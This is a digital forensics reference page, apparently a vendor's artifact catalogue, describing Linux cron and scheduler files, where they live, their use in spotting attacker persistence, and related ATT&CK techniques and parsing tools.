Skip to content
LinuxExecutionHigh

Linux Cron & Scheduler Artifacts

Time-based job scheduler configuration (system and per-user crontabs, drop-in directories) plus the execution log written by cron/anacron. Key artifact for persistence detection on Linux servers.

artifact_type: linux_cron

Where to find it

Default filesystem paths and registry locations. Collect these with your preferred live-response or disk-image tooling.

  • $/etc/crontab
  • $/etc/cron.d/
  • $/etc/cron.hourly/
  • $/etc/cron.daily/
  • $/var/spool/cron/crontabs/
  • $/var/log/cron
  • $/var/log/cron.log

Forensic significance

Common scenarios in which this artifact becomes decisive evidence.

  • Persistence — attacker-installed cron job calling back to C2
  • Identifying scheduled exfiltration windows that match traffic anomalies
  • Detecting sudden additions to /etc/cron.d after a known intrusion
  • Comparing crontab modification times against admin change tickets

MITRE ATT&CK mapping

Techniques this artifact can help detect or substantiate. Click a technique to view the official MITRE entry.

T1053.003T1037

Tools that parse it

unJaena AI and other DFIR tools commonly used to extract evidence from this artifact.

unJaena AI
Plaso (log2timeline)
Lynis
OSSEC

Related artifacts

Linux

systemd Journal (journald)

Binary, structured, indexed log store written by systemd-journald. Contains kernel ring buffer, dmesg, all unit (service) output, and authenticated metadata such as UID, GID, PID, command line, and SELinux context for every entry.

Linux

Linux Auth Log

Authentication and authorization events emitted by PAM-aware services — sshd logins, sudo invocations, su attempts, screen unlocks, and polkit decisions. The first place to look when scoping a Linux compromise.

Linux

Bash Shell History

Per-user record of every interactive shell command executed by Bash, written to ~/.bash_history on logout (or in real time when HISTTIMEFORMAT and PROMPT_COMMAND are configured).

Windows

Amcache.hve

Compatibility database introduced in Windows 8 that records every PE file executed on the system, including SHA-1 hash, full path, publisher, and first-seen timestamp.

References & further reading

Stop parsing artifacts by hand

unJaena AI ingests disk images, live-response output, and mobile backups, then automatically correlates every artifact on this page — and 200+ more — into an investigator-ready timeline.

Try unJaena AI